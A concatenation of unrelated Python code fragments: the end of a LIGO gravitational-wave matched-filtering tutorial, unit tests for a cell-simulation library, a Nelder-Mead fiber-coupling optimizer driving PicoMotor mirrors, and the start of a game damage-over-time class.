    plt.subplot(4,1,3)
    plt.plot(ttime,fGW)
    plt.xlim([-1.1,0.1])
    plt.grid()
    plt.xlabel('time (s)')
    plt.ylabel('f_GW')
    #plt.title(eventname+' template f_GW')
    plt.subplot(4,1,4)
    plt.plot(ttime,voverc)
    plt.xlim([-1.1,0.1])
    plt.grid()
    plt.xlabel('time (s)')
    plt.ylabel('v/c')
    #plt.title(eventname+' template v/c')
    plt.savefig(eventname+'_template.'+plottype)
# ## Matched filtering to find the signal
#
# Matched filtering is the optimal way to find a known signal buried in stationary, Gaussian noise. It is the standard technique used by the gravitational wave community to find GW signals from compact binary mergers in noisy detector data.
#
# For some loud signals, it may be possible to see the signal in the whitened data or spectrograms. On the other hand, low signal-to-noise ratio (SNR) signals or signals which are of long duration in time may not be visible, even in the whitened data. LIGO scientists use matched filtering to find such "hidden" signals. A matched filter works by compressing the entire signal into one time bin (by convention, the "end time" of the waveform).
#
# LIGO uses a rather elaborate software suite to match the data against a family of such signal waveforms ("templates"), to find the best match. This procedure helps to "optimally" separate signals from instrumental noise, and to infer the parameters of the source (masses, spins, sky location, orbit orientation, etc) from the best match templates.
#
# A blind search requires us to search over many compact binary merger templates (eg, 250,000) with different masses and spins, as well as over all times in all detectors, and then requiring triggers coincident in time and template between detectors. It's an extremely complex and computationally-intensive "search pipeline".
#
# Here, we simplify things, using only one template (the one identified in the full search as being a good match to | |
<gh_stars>0
import unittest
from unittest import mock
from unittest.mock import MagicMock
from clovars.abstract import Circle
from clovars.bio import Cell, Treatment
from clovars.scientific import ConstantCellSignal, CellSignal, GaussianCellSignal, Gaussian
from clovars.utils import SimulationError
from tests import NotEmptyTestCase
class TestCell(NotEmptyTestCase):
    """Class representing unit-tests for clovars.bio.cell.Cell class."""

    # Time step (in seconds) used when evaluating division/death chances.
    default_delta = 100
    # Shared Treatment fixture: division ~ N(24 h, 5 h), death ~ N(32 h, 5 h).
    control_treatment = Treatment(
        name="Control",
        division_curve=Gaussian(loc=24.0, scale=5),
        death_curve=Gaussian(loc=32, scale=5),
    )

    @classmethod
    def setUpClass(cls) -> None:
        """Sets up the test suite (currently a no-op)."""
        pass

    def setUp(self) -> None:
        """Sets up the test case subject (a Cell instance)."""
        self.cell = Cell()
# def test_cell_has_default_treatment_class_attribute(self) -> None:
# """Tests whether a Cell has a "default_treatment" class attribute (a Treatment instance)."""
# self.assertTrue(hasattr(self.cell, 'default_treatment'))
# self.assertTrue(hasattr(Cell, 'default_treatment'))
# self.assertIsInstance(self.cell.default_treatment, Treatment)
    # --- Attribute presence and default-value tests ---

    def test_cell_has_name_attribute(self) -> None:
        """Tests whether a Cell has a "name" attribute (a string)."""
        self.assertTrue(hasattr(self.cell, 'name'))
        self.assertIsInstance(self.cell.name, str)

    def test_cell_has_max_speed_attribute(self) -> None:
        """Tests whether a Cell has a "max_speed" attribute (a float value)."""
        self.assertTrue(hasattr(self.cell, 'max_speed'))
        self.assertIsInstance(self.cell.max_speed, float)

    def test_cell_has_fate_attribute(self) -> None:
        """Tests whether a Cell has a "fate" attribute (a string)."""
        self.assertTrue(hasattr(self.cell, 'fate'))
        self.assertIsInstance(self.cell.fate, str)

    def test_fate_attribute_starts_as_migration(self) -> None:
        """Tests whether a Cell starts with its "fate" attribute set to "migration"."""
        self.assertEqual(Cell().fate, "migration")

    def test_cell_has_seconds_since_birth_attribute(self) -> None:
        """Tests whether a Cell has a "seconds_since_birth" attribute (an integer)."""
        self.assertTrue(hasattr(self.cell, 'seconds_since_birth'))
        self.assertIsInstance(self.cell.seconds_since_birth, int)

    def test_seconds_since_birth_attribute_starts_at_zero(self) -> None:
        """Tests whether a Cell starts with its "seconds_since_birth" attribute set to 0."""
        self.assertEqual(Cell().seconds_since_birth, 0)

    def test_cell_has_alive_attribute(self) -> None:
        """Tests whether a Cell has an "alive" attribute (a boolean value)."""
        self.assertTrue(hasattr(self.cell, 'alive'))
        self.assertIsInstance(self.cell.alive, bool)

    def test_alive_attribute_starts_true(self) -> None:
        """Tests whether a Cell starts with its "alive" attribute set to True."""
        self.assertEqual(Cell().alive, True)

    def test_cell_has_senescent_attribute(self) -> None:
        """Tests whether a Cell has a "senescent" attribute (a boolean value)."""
        self.assertTrue(hasattr(self.cell, 'senescent'))
        self.assertIsInstance(self.cell.senescent, bool)

    def test_senescent_attribute_starts_false(self) -> None:
        """Tests whether a Cell starts with its "senescent" attribute set to False."""
        self.assertEqual(Cell().senescent, False)
    # --- Fitness-memory and threshold range/validation tests ---

    def test_cell_has_fitness_memory_attribute(self) -> None:
        """Tests whether a Cell has a "fitness_memory" attribute (a float)."""
        self.assertTrue(hasattr(self.cell, 'fitness_memory'))
        self.assertIsInstance(self.cell.fitness_memory, float)

    def test_fitness_memory_outside_zero_one_range_raises_error(self) -> None:
        """
        Tests whether a Cell raises a SimulationError only when its "fitness_memory"
        attribute is initialized outside the [0, 1] interval.
        """
        for fitness_memory in [0.0, 0.2, 0.4, 0.6, 0.8, 1.0]:
            try:
                Cell(fitness_memory=fitness_memory)
            except SimulationError:
                self.fail(
                    "SimulationError was unexpectedly raised when initializing Cell"
                    f" with fitness_memory = {fitness_memory}"
                )
        for fitness_memory in [-0.1, 1.1]:
            with self.assertRaises(SimulationError):
                Cell(fitness_memory=fitness_memory)

    def test_cell_has_division_threshold_attribute(self) -> None:
        """Tests whether a Cell has a "division_threshold" attribute (a float)."""
        self.assertTrue(hasattr(self.cell, 'division_threshold'))
        self.assertIsInstance(self.cell.division_threshold, float)

    def test_division_threshold_outside_zero_one_range_raises_error(self) -> None:
        """
        Tests whether a Cell raises a SimulationError only when its "division_threshold"
        attribute is initialized outside the [0, 1] interval.
        """
        for division_threshold in [0.0, 0.2, 0.4, 0.6, 0.8, 1.0]:
            try:
                Cell(division_threshold=division_threshold)
            except SimulationError:
                self.fail(
                    "SimulationError was unexpectedly raised when initializing Cell"
                    f" with division_threshold = {division_threshold}"
                )
        for division_threshold in [-0.1, 1.1]:
            with self.assertRaises(SimulationError):
                Cell(division_threshold=division_threshold)

    def test_cell_division_threshold_attribute_is_between_zero_and_one(self) -> None:
        """
        Tests whether the "division_threshold" attribute (random float value) lies between 0 and 1
        when it is initialized as a None value.
        """
        for _ in range(10):
            cell = Cell(division_threshold=None)
            with self.subTest(cell=cell):
                self.assertGreaterEqual(cell.division_threshold, 0)
                self.assertLessEqual(cell.division_threshold, 1)

    def test_cell_has_death_threshold_attribute(self) -> None:
        """Tests whether a Cell has a "death_threshold" attribute (a float)."""
        self.assertTrue(hasattr(self.cell, 'death_threshold'))
        self.assertIsInstance(self.cell.death_threshold, float)

    def test_death_threshold_outside_zero_one_range_raises_error(self) -> None:
        """
        Tests whether a Cell raises a SimulationError only when its "death_threshold"
        attribute is initialized outside the [0, 1] interval.
        """
        for death_threshold in [0.0, 0.2, 0.4, 0.6, 0.8, 1.0]:
            try:
                Cell(death_threshold=death_threshold)
            except SimulationError:
                self.fail(
                    "SimulationError was unexpectedly raised when initializing Cell"
                    f" with death_threshold = {death_threshold}"
                )
        for death_threshold in [-0.1, 1.1]:
            with self.assertRaises(SimulationError):
                Cell(death_threshold=death_threshold)

    def test_cell_death_threshold_attribute_is_between_zero_and_one(self) -> None:
        """
        Tests whether the "death_threshold" attribute (random float value) lies between 0 and 1
        when it is initialized as a None value.
        """
        for _ in range(10):
            cell = Cell(death_threshold=None)
            with self.subTest(cell=cell):
                self.assertGreaterEqual(cell.death_threshold, 0)
                self.assertLessEqual(cell.death_threshold, 1)

    # NOTE(review): near-duplicate of the test above; this one exercises the
    # default-constructed Cell() rather than death_threshold=None explicitly.
    def test_cell_has_death_threshold_attribute_is_between_zero_and_one(self) -> None:
        """Tests whether the "death_threshold" attribute (random float value) lies between 0 and 1."""
        for _ in range(10):
            cell = Cell()
            with self.subTest(cell=cell):
                self.assertGreaterEqual(cell.death_threshold, 0)
                self.assertLessEqual(cell.death_threshold, 1)
    # --- Composition tests: circle, signal and treatment collaborators ---

    def test_cell_has_circle_attribute(self) -> None:
        """Tests whether a Cell has a "circle" attribute (a Circle instance)."""
        self.assertTrue(hasattr(self.cell, 'circle'))
        self.assertIsInstance(self.cell.circle, Circle)

    def test_cell_has_signal_attribute(self) -> None:
        """Tests whether a Cell has a "signal" attribute (a CellSignal instance)."""
        self.assertTrue(hasattr(self.cell, 'signal'))
        self.assertIsInstance(self.cell.signal, CellSignal)

    def test_cell_uses_a_constant_signal_if_signal_argument_is_none(self) -> None:
        """Tests whether a Cell uses a ConstantCellSignal instance when initialized with signal=None."""
        cell = Cell(signal=None)
        self.assertIsInstance(cell.signal, ConstantCellSignal)

    def test_cell_has_treatment_attribute(self) -> None:
        """Tests whether a Cell has a "treatment" attribute (a Treatment instance)."""
        self.assertTrue(hasattr(self.cell, 'treatment'))
        self.assertIsInstance(self.cell.treatment, Treatment)
# def test_cell_uses_the_default_treatment_if_treatment_argument_is_none(self) -> None:
# """Tests whether a Cell uses the "default_treatment" class attribute when initialized with treatment=None."""
# cell = Cell(signal=None)
# self.assertIs(cell.treatment, self.cell.default_treatment)
    def test_calculate_division_chance_method_returns_chance_depending_on_the_cell_seconds_since_birth(self) -> None:
        """
        Tests whether the "calculate_division_chance" method returns a chance between
        [0, 1] proportional to the Cell's age.
        """
        self.cell.treatment = self.control_treatment  # division stats: 24 (+-5) hours
        self.cell.seconds_since_birth = 0  # Very low chance of dividing right after birth
        self.assertLess(self.cell.calculate_division_chance(delta=self.default_delta), 0.1)
        self.cell.seconds_since_birth = 60 * 60 * 1000  # Very high chance of dividing after 1000 h
        self.assertGreater(self.cell.calculate_division_chance(delta=self.default_delta), 0.9)

    def test_calculate_death_chance_method_returns_chance_depending_on_the_cell_seconds_since_birth(self) -> None:
        """
        Tests whether the "calculate_death_chance" method returns a chance between
        [0, 1] proportional to the Cell's age.
        """
        # fixed comment: the control treatment's death curve is 32 (+-5) hours, not 24
        self.cell.treatment = self.control_treatment  # death stats: 32 (+-5) hours
        self.cell.seconds_since_birth = 0  # Very low chance of dying right after birth
        self.assertLess(self.cell.calculate_death_chance(delta=self.default_delta), 0.1)
        self.cell.seconds_since_birth = 60 * 60 * 1000  # Very high chance of dying after 1000 h
        self.assertGreater(self.cell.calculate_death_chance(delta=self.default_delta), 0.9)
    # --- Circle-delegation and distance tests ---

    def test_cell_has_circle_attributes_as_properties(self) -> None:
        """Tests whether a Cell exposes relevant Circle attributes as properties."""
        test_cell = Cell(x=10.0, y=20.0, radius=5.0)
        for attr_name in ['x', 'y', 'radius', 'center', 'area']:
            with self.subTest(attr_name=attr_name):
                try:
                    value = getattr(test_cell, attr_name)
                    self.assertEqual(value, getattr(test_cell.circle, attr_name))
                except AttributeError:
                    self.fail(f"Test failed: could not get attribute {attr_name} in Cell instance {test_cell}")

    def test_cell_is_able_to_set_circle_attributes(self) -> None:
        """Tests whether a Cell is able to directly set its "x", "y" and "radius" Circle attributes."""
        test_cell = Cell(x=10.0, y=20.0, radius=5.0)
        for attr_name in ['x', 'y', 'radius']:
            with self.subTest(attr_name=attr_name):
                try:
                    setattr(test_cell, attr_name, 1.0)
                except AttributeError:
                    self.fail(f"Test failed: could not set attribute {attr_name} in Cell instance {test_cell}")

    def test_cell_distance_to_method_calculates_cell_distance_using_circles(self) -> None:
        """Tests whether the "distance_to" method uses Circles to calculate distance between Cells."""
        other_cell = Cell()
        with mock.patch("clovars.abstract.Circle.distance_to") as mock_circle_distance_to:
            self.cell.distance_to(other_cell=other_cell)
        mock_circle_distance_to.assert_called_once_with(other_cell.circle)

    def test_cell_distance_to_method_raises_type_error_if_argument_is_not_a_cell(self) -> None:
        """
        Tests whether the "distance_to" method raises a TypeError only when the
        other_cell argument is not an actual Cell instance.
        """
        valid_argument = Cell()
        try:
            self.cell.distance_to(other_cell=valid_argument)
        except TypeError:
            self.fail("Cell raised TypeError unexpectedly!")
        invalid_argument = "WHATEVER ELSE"
        with self.assertRaises(TypeError):
            self.cell.distance_to(other_cell=invalid_argument)  # noqa
    # --- Derived-property tests: hours_since_birth, branch/colony names, generation ---

    def test_cell_has_hours_since_birth_property(self) -> None:
        """Tests whether a Cell has an "hours_since_birth" property (a float)."""
        self.assertTrue(hasattr(self.cell, 'hours_since_birth'))
        self.assertIsInstance(self.cell.hours_since_birth, float)

    def test_hours_since_birth_calculations_are_correct(self) -> None:
        """Tests whether the "hours_since_birth" property correctly calculates the Cell's hours since birth."""
        for seconds, hours in [(0, 0.0), (60, 1/60), (3600, 1.0), (7200, 2.0), (9000, 2.5)]:
            with self.subTest(seconds=seconds, hours=hours):
                self.cell.seconds_since_birth = seconds
                self.assertEqual(self.cell.hours_since_birth, hours)

    def test_cell_has_branch_name_property(self) -> None:
        """Tests whether a Cell has a "branch_name" property (a string)."""
        self.assertTrue(hasattr(self.cell, 'branch_name'))
        self.assertIsInstance(self.cell.branch_name, str)

    def test_branch_name_returns_root_name_up_to_first_division(self) -> None:
        """Tests whether the "branch_name" property returns the Cell's root name, including the branch number."""
        for cell_name, branch_name in [('1', '1'), ('3b.1', '3b'), ('15e-5.1.2', '15e-5'), ('4d-3.2.2.1.2', '4d-3')]:
            with self.subTest(cell_name=cell_name, branch_name=branch_name):
                self.cell.name = cell_name
                self.assertEqual(self.cell.branch_name, branch_name)

    def test_cell_has_colony_name_property(self) -> None:
        """Tests whether a Cell has a "colony_name" property (a string)."""
        self.assertTrue(hasattr(self.cell, 'colony_name'))
        self.assertIsInstance(self.cell.colony_name, str)

    def test_colony_name_returns_root_name_up_to_branch_name(self) -> None:
        """Tests whether the "colony_name" property returns the Cell's root name, excluding the branch number."""
        for cell_name, colony_name in [('1', '1'), ('3b.1', '3b'), ('15e-5.1.2', '15e'), ('4d-3.2.2.1.2', '4d')]:
            with self.subTest(cell_name=cell_name, colony_name=colony_name):
                self.cell.name = cell_name
                self.assertEqual(self.cell.colony_name, colony_name)

    def test_cell_has_generation_property(self) -> None:
        """Tests whether a Cell has a "generation" property (an integer)."""
        self.assertTrue(hasattr(self.cell, 'generation'))
        self.assertIsInstance(self.cell.generation, int)

    def test_generation_returns_cell_name_prefix(self) -> None:
        """
        Tests whether the "generation" property returns the number of times that the Cell has divided
        based on its name.
        """
        for cell_name, generation in [('1', 0), ('3b.1', 1), ('15e-5.1.2', 2), ('4d-3.2.2.1.2', 4)]:
            with self.subTest(cell_name=cell_name, generation=generation):
                self.cell.name = cell_name
                self.assertEqual(self.cell.generation, generation)
def test_cell_has_signal_value_property(self) -> None:
"""Tests whether a Cell has a "signal_value" property (a float)."""
self.assertTrue(hasattr(self.cell, 'signal_value'))
| |
<reponame>robert-kauffman/fiber_coupling_optimization
from PicoMotor8742Controller import PicoMotor8742Controller
from PyDAQmx import *
from PyDAQmx.DAQmxConstants import *
import time
import numpy as np
# Globals for communication between computer and motors. Entered by user.
host = '169.254.179.96'
port = 23
# Number of samples wanted. More samples means less noise but longer read time. Entered by user.
num_samples = 1000
# The length of optimization time in seconds. Entered by user.
TIMEOUT = 300
# Desired power of fiber coupling for optimization. Entered by user.
desired_power = 30
# Creates communication between computer and motors.
# NOTE(review): this opens the motor connection at import time, so importing
# the module requires the hardware to be reachable.
pmc = PicoMotor8742Controller(host, port, 1)
# These globals define the use of the ThorLabs PM100A power meter used in the creation of this program.
power_meter = 'PM100A'
# Running count of manual power-meter range increases (one decade each).
number_of_rescales = 0
#Read the output of the power meter in the form of an array of outputs.
def read_output():
    """Read `num_samples` voltages from the DAQ channel Dev3/AI0.

    Returns:
        A numpy array of `num_samples` raw voltage readings.
    """
    read_array = np.zeros(num_samples)
    samples_read = int32()
    task = Task()
    task.CreateAIVoltageChan('Dev3/AI0', "", DAQmx_Val_RSE, 0, 2, DAQmx_Val_Volts, None)
    task.StartTask()
    task.ReadAnalogF64(
        num_samples,
        -1,  # timeout: wait indefinitely until all samples are acquired
        DAQmx_Val_GroupByScanNumber,
        read_array,
        num_samples,
        samples_read,
        None
    )
    # Stop and clear the task so repeated calls don't accumulate open DAQ
    # handles (canonical NI-DAQmx acquire/stop/clear sequence).
    task.StopTask()
    task.ClearTask()
    return read_array
#Function used only if the power_meter = 'PM100A'
#Power converts power meter output into mW and prompts rescaling of power meter to keep track of powers of 10.
def convert_PM100A_meter_output_to_mW():
    """Convert the PM100A analog output to mW, prompting the user to rescale.

    Blocks on `input()` whenever the reading saturates (> 1.8 V); each manual
    rescale is counted as one decade in the module-global `number_of_rescales`.
    """
    global number_of_rescales
    output = read_output().mean()
    while output > 1.8:
        input('Increase power meter range and then press enter.')
        number_of_rescales = number_of_rescales + 1
        output = read_output().mean()
    # 0.0056 per (V/2) at the base range -- presumably a device calibration
    # factor; confirm against the PM100A analog-output configuration.
    power = (output / 2) * 0.0056 * 10 ** number_of_rescales
    return power
#Find an average of the output array.
#Needs the power_meter string to know how to read/average specific power meter output.
def average_output():
    """Return one averaged power reading (converted to mW for the PM100A)."""
    if power_meter == 'PM100A':
        return convert_PM100A_meter_output_to_mW()
    return read_output().mean()
#Relative motion of one motor. Used in the correct_hysteresis and explore functions.
#Requires the number of motor wanted in motion and its displacement.
def move_one_motor_rel(motor, motor_displacement):
    """Move a single motor axis by a relative displacement (in steps)."""
    pmc.move_axis_rel(axis=motor, displacement=motor_displacement)
#Absolute motion of one motor. Not in use currently*
#Requires the number of motor wanted in motion and its destination.
def move_one_motor_abs(motor, motor_target_position):
    """Move a single motor axis to an absolute target position (in steps).

    Fixed: this previously called `move_axis_rel` with a `target_position`
    keyword; absolute motion must use `move_axis_abs`, matching the
    multi-motor absolute helpers in this module.
    """
    pmc.move_axis_abs(axis=motor, target_position=motor_target_position)
#Relative motion of two motors. Used in the correct_hysteresis funtion.
#Requires the numbers of the motors wanted in motion and their displacements.
def move_two_motors_rel(motor1, motor2, motor1_displacement, motor2_displacement):
    """Move two motor axes by their respective relative displacements (in steps)."""
    for axis, displacement in ((motor1, motor1_displacement), (motor2, motor2_displacement)):
        pmc.move_axis_rel(axis=axis, displacement=int(displacement))
#Absolute motion of two motors. Not in use currently*
#Requires the numbers of the motors wanted in motion and their destinations.
def move_two_motors_abs(motor1, motor2, motor1_target_position, motor2_target_position):
    """Move two motor axes to their respective absolute target positions (in steps)."""
    for axis, target in ((motor1, motor1_target_position), (motor2, motor2_target_position)):
        pmc.move_axis_abs(axis=axis, target_position=int(target))
#Absolute motion of four motors. Used all throughout optimize function.
#Requires the numbers of the motors wanted in motion and their destinations in the form of an array.
def move_four_motors_abs(motor1, motor2, motor3, motor4, motor_positions):
    """Send each of the four axes to its absolute target position.

    ``motor_positions`` is an indexable of four targets ordered to match
    motor1..motor4; each target is truncated to int before dispatch.
    """
    axes = (motor1, motor2, motor3, motor4)
    for index, axis in enumerate(axes):
        pmc.move_axis_abs(axis=axis, target_position=int(motor_positions[index]))
#Sets motor's current position to 0. Used in randomize_initial_simplex function to set current position to origin.
#Requires number of motor to be set to 0.
def set_motor_home(motor):
    """Define the motor's current physical position as the origin (position 0)."""
    pmc.set_axis_home(axis=motor, home_position=0)
#Sets motor positions to 0 and randomizes the initial simplex of positions before optimization. Used all throughout optimize function.
#Requires the numbers of motors to have positions randomized and a range at which to search for positions from + to - the given range.
def randomize_initial_simplex(motor1, motor2, motor3, motor4, simplex_range):
    """Build the five-vertex starting simplex for the 4-motor optimizer.

    Vertex 1 is the (re-homed) origin; the remaining four vertices are drawn
    uniformly from [-simplex_range/2, simplex_range/2) per axis.  Measured
    outputs are stored in parallel in the global ``output_simplex``.

    Refactor: the original unrolled the four random vertices into four
    near-identical copies of the same code; this collapses them into a loop
    with identical call ordering.
    """
    global simplex, output_simplex
    for motor in (motor1, motor2, motor3, motor4):
        set_motor_home(motor)
    simplex = [[0, 0, 0, 0]]
    read_output()
    output_simplex = [average_output()]
    for _ in range(4):
        vertex = np.random.randint(low=-(simplex_range / 2),
                                   high=(simplex_range / 2), size=4).tolist()
        # NOTE(review): as in the original, axes 1-4 are driven here regardless
        # of the motor numbers passed in — preserved for compatibility.
        move_four_motors_abs(1, 2, 3, 4, vertex)
        read_output()
        simplex.append(vertex)
        output_simplex.append(average_output())
#Used in order function so the simplex can be sorted by outputs.
#Requires no inputted val and sorts by last element in array.
def sort_by_output(val):
    """Sort key: a vertex's measured output, stored as its last element."""
    *_, last_element = val
    return last_element
#Orders simplex positions from least to greatest output. Used all throughout optimize function.
#Requires simplex and output_simplex arrays.
def order(positions, output_positions):
    """Sort the global simplex (and output_simplex) by measured output, ascending.

    Bug fix: the original appended each output to its vertex, sorted, and then
    ``list.remove``d the output again.  ``remove`` deletes the first matching
    *value*, so any coordinate equal to the vertex's output would be deleted
    instead, corrupting the vertex.  Sorting vertex/output pairs avoids the
    append/remove round-trip entirely.  Both sorts are stable, matching the
    original's tie behavior.

    NOTE(review): like the original, this ignores its parameters and mutates
    the module-level ``simplex``/``output_simplex`` in place.
    """
    paired = sorted(zip(simplex, output_simplex), key=lambda pair: pair[1])
    simplex[:] = [vertex for vertex, _ in paired]
    output_simplex[:] = [output for _, output in paired]
#Solves for the centroid of the simplex excluding the worst position. Used in elements of downhill_simplex and optimize function.
#Requires no inputs and uses whatever the current global simplex is.
def centroid():
    """Publish best/worst vertices and the centroid of the four non-worst
    vertices into the module-level ``*_position`` globals.

    Assumes order() has run, so simplex[0] is worst and simplex[-1] is best.
    """
    global centroid_position, best_position, worst_position
    number_of_motors = 4
    best_position = np.array(simplex[-1])
    worst_position = np.array(simplex[0])
    # Average every vertex except the worst (indices 1..4).
    accumulated = np.array(simplex[1])
    for vertex in simplex[2:]:
        accumulated = accumulated + np.array(vertex)
    centroid_position = accumulated / number_of_motors
#Solves for a position reflected from the worst position. Used in elements of downhill_simplex and optimize function.
#Requires the numbers of the four motors.
def reflection(motor1, motor2, motor3, motor4):
    """Reflect the worst vertex through the centroid, drive the motors there,
    and record the measured output in the ``reflection_*`` globals.

    Relies on centroid() having set centroid_position/worst_position.
    """
    global reflection_position, reflection_output
    # Standard Nelder-Mead reflection with coefficient alpha = 1.
    reflection_position = centroid_position + 1 * (centroid_position - worst_position)
    move_four_motors_abs(motor1, motor2, motor3, motor4, reflection_position)
    read_output()
    reflection_output = average_output()
#Solves for a position expanded from the reflected position. Used in elements of downhill_simplex and optimize function.
#Requires the numbers of the four motors.
def expansion(motor1, motor2, motor3, motor4):
    """Expand past the reflected vertex, drive the motors there, and record
    the measured output in the ``expansion_*`` globals.

    Relies on reflection() having set reflection_position.
    """
    global expansion_position, expansion_output
    # Standard Nelder-Mead expansion with coefficient gamma = 2.
    expansion_position = centroid_position + 2 * (reflection_position - centroid_position)
    move_four_motors_abs(motor1, motor2, motor3, motor4, expansion_position)
    read_output()
    expansion_output = average_output()
#Solves for a position contracted inside the simplex. Used in elements of downhill_simplex and optimize function.
#Requires the numbers of the four motors.
def contraction(motor1, motor2, motor3, motor4):
    """Contract halfway from the centroid toward the worst vertex, drive the
    motors there, and record the measured output in the ``contraction_*`` globals.
    """
    global contraction_position, contraction_output
    # Standard Nelder-Mead contraction with coefficient rho = 0.5.
    contraction_position = centroid_position + 0.5 * (worst_position - centroid_position)
    move_four_motors_abs(motor1, motor2, motor3, motor4, contraction_position)
    read_output()
    contraction_output = average_output()
#Solves for all new simplex positions shrunk toward the current best position. Used in elements of downhill_simplex and optimize function.
#Requires the numbers of the four motors.
def shrink(motor1, motor2, motor3, motor4):
    """Shrink every non-best vertex halfway toward the best vertex, measuring
    the output at each new position.

    Publishes shrink_position1..4 / shrink_output1..4 globals exactly as the
    original unrolled version did (refactor: four near-identical copies of the
    same block collapsed into one loop with identical call ordering).
    """
    global shrink_position1, shrink_output1, shrink_position2, shrink_output2, shrink_position3, shrink_output3, shrink_position4, shrink_output4
    positions = []
    outputs = []
    # Vertex 0 is addressed through worst_position (set by centroid()) to match
    # the original's behavior; vertices 1-3 are read from the simplex directly.
    for vertex in (worst_position, simplex[1], simplex[2], simplex[3]):
        new_position = best_position + 0.5 * (np.array(vertex) - best_position)
        move_four_motors_abs(motor1, motor2, motor3, motor4, new_position)
        read_output()
        positions.append(new_position)
        outputs.append(average_output())
    shrink_position1, shrink_position2, shrink_position3, shrink_position4 = positions
    shrink_output1, shrink_output2, shrink_output3, shrink_output4 = outputs
#Corrects hysteresis through a process of moving two motors relatively in an output increasing direction. Used in optimize function when local max is found.
#Requires the numbers of the motors to be corrected. Corrected motors should usually be the two horizontals together and two verticals together.
def correct_hysteresis(motor1, motor2):
    """Take up mechanical backlash by stepping two motors in whichever
    direction increases the measured output, then backing off the last step.

    Phase 1 probes each motor individually (50 steps): if the first step
    lowers the output, the direction is flipped and the motor is stepped back
    twice (net one step in the new direction).  Phase 2 climbs with both
    motors together until the output stops improving, then undoes the final
    (worsening) step.
    """
    motor1_motion = 50
    motor2_motion = 50
    counter = 0  # NOTE(review): never used — kept to leave behavior byte-identical
    read_output()
    prev_output = average_output()
    # --- Phase 1a: find motor1's improving direction. ---
    move_one_motor_rel(motor1, motor1_motion)
    read_output()
    new_output = average_output()
    if new_output < prev_output:
        motor1_motion = -motor1_motion
        # Two steps in the flipped direction: one to undo, one to probe.
        move_one_motor_rel(motor1, 2*motor1_motion)
        read_output()
        new_output = average_output()
    prev_output = new_output
    # --- Phase 1b: find motor2's improving direction. ---
    move_one_motor_rel(motor2, motor2_motion)
    read_output()
    new_output = average_output()
    if new_output < prev_output:
        motor2_motion = -motor2_motion
        move_one_motor_rel(motor2, 2*motor2_motion)
        read_output()
        new_output = average_output()
    # --- Phase 2: climb with both motors while the output keeps improving. ---
    while new_output >= prev_output:
        prev_output = new_output
        move_two_motors_rel(motor1, motor2, motor1_motion, motor2_motion)
        read_output()
        new_output = average_output()
    # The last step made things worse; undo it.
    move_two_motors_rel(motor1, motor2, -motor1_motion, -motor2_motion)
#Explores one motor in one direction 2000 steps by moving this far and working back to the original position 100 steps at a time. Used in optimize function.
#Requires the motor to be explored and the direction of exploration (1 is forward and -1 is backward).
def explore_motor(motor, direction):
    """Scan one motor over a 2000-step range in 100-step increments and finish
    on the best position found (or back at the origin if none beat it).

    The motor jumps to the far end of the range, then samples on the way back;
    after each backward step the position is explore_counter * explore_step,
    so the scan visits 1900, 1800, ..., 100, 0 (times direction).

    Bug fix: the loop previously ran while ``explore_counter >= 0``, taking 21
    backward steps after a 20-step jump.  That left the motor at -100 and made
    the final move land one full step short of the recorded best position (and
    at -100 instead of the origin when nothing beat the starting output).
    """
    explore_step = 100
    if direction < 0:
        explore_step = -explore_step
    explore_counter = 20
    best_count = 0
    read_output()
    target_output = average_output()
    # Jump to the far end of the scan range, then sample on the way back.
    move_one_motor_rel(motor, explore_counter*explore_step)
    while explore_counter > 0:
        explore_counter = explore_counter - 1
        move_one_motor_rel(motor, -explore_step)
        read_output()
        explore_output = average_output()
        if explore_output > target_output:
            best_count = explore_counter
            target_output = explore_output
    # Back at the origin; return to the best sampled position.
    move_one_motor_rel(motor, explore_step*best_count)
#Optimizes four motors and finds a local maximum of power. Begins with intializing a simplex and performing downhill simplex. After three iterations of same best postion
#this function corrects for hystersis and prompts the user to decide if they would like to continue optimizing. If a low ouput is found, optimizer will explore to find
#the global peak instead. Optimization with stop if desired power is achieved.
#Requires the numbers of the motors being optimized and a desired output power in mW.
#Input the mirrors' horizontal motors as motor1 and motor3 and the mirrors' vertical motors as motor2 and motor4.
def optimize(motor1, motor2, motor3, motor4, desired_power):
global simplex, output_simplex
# simplex_counter = 0
hysteresis_counter = 0
hysteresis_corrected = False
if power_meter == 'PM100A':
input("Start at lowest range setting (R 5.6uW) and | |
<gh_stars>0
from collections import defaultdict, namedtuple
from core.timeline import *
from core.log import *
import random
AFFLICT_LIST = ['poison', 'paralysis', 'burn', 'blind', 'bog', 'stun', 'freeze', 'sleep', 'frostbite']
class Dot(object):
    """
    Damage over time; e.g. poison.

    While active, fires a 'true_dmg' event every `iv` seconds; the per-tick
    damage is computed once, when the dot is applied, via a 'dmg_formula'
    event.  The dot deactivates itself after `duration` seconds.
    """
    def __init__(self, name, coef, duration, iv, dtype=None):
        # name: log/display name; dtype: damage type (defaults to name).
        self.name = name
        self.dtype = dtype
        self.active = 0
        self.coef = coef  # damage coefficient fed to the dmg_formula event
        self.iv = iv # Seconds between each damage tick
        self.duration = duration
        # Event re-fired on every tick to deal the (pre-computed) tick damage.
        self.true_dmg_event = Event('true_dmg')
        self.true_dmg_event.dname = name
        self.true_dmg_event.dtype = dtype if dtype else name
        self.true_dmg_event.comment = ''
        self.tick_dmg = 0
        # Event fired once in on() to evaluate the damage formula.
        self.quickshot_event = Event('dmg_formula')
        self.tick_timer = Timer(self.tick_proc)
        self.dotend_timer = Timer(self.dot_end_proc)
    def dot_end_proc(self, t):
        # Duration elapsed: stop ticking and notify subclasses via cb_end().
        log('dot', self.name, 'end\t')
        self.active = 0
        self.tick_timer.off()
        self.cb_end()
    def cb_end(self):
        # Hook for subclasses; called when the dot expires naturally.
        pass
    def tick_proc(self, t):
        if self.active == 0:
            return
        # Re-arm the timer for the next tick, then deal the cached tick damage.
        t.timing += self.iv
        self.true_dmg_event.count = self.tick_dmg
        self.true_dmg_event.on()
    def __call__(self):
        return self.on()
    def get(self):
        # 1 while the dot is running, else 0.
        return self.active
    def on(self):
        """Activate the dot; returns 1 on success, 0 if already active."""
        if self.active:
            log('dot', self.name, 'failed\t')
            return 0
        self.active = 1
        self.tick_timer.on(self.iv)
        self.dotend_timer.on(self.duration)
        # Evaluate tick damage once, up front, via the dmg_formula event.
        self.quickshot_event.dmg_coef = self.coef
        self.quickshot_event.dname = self.name
        self.quickshot_event.dtype = self.dtype if self.dtype else self.name
        self.quickshot_event()
        self.tick_dmg = self.quickshot_event.dmg
        log('dot', self.name, 'start\t', '%f/%d' % (self.iv, self.duration))
        return 1
    def off(self):
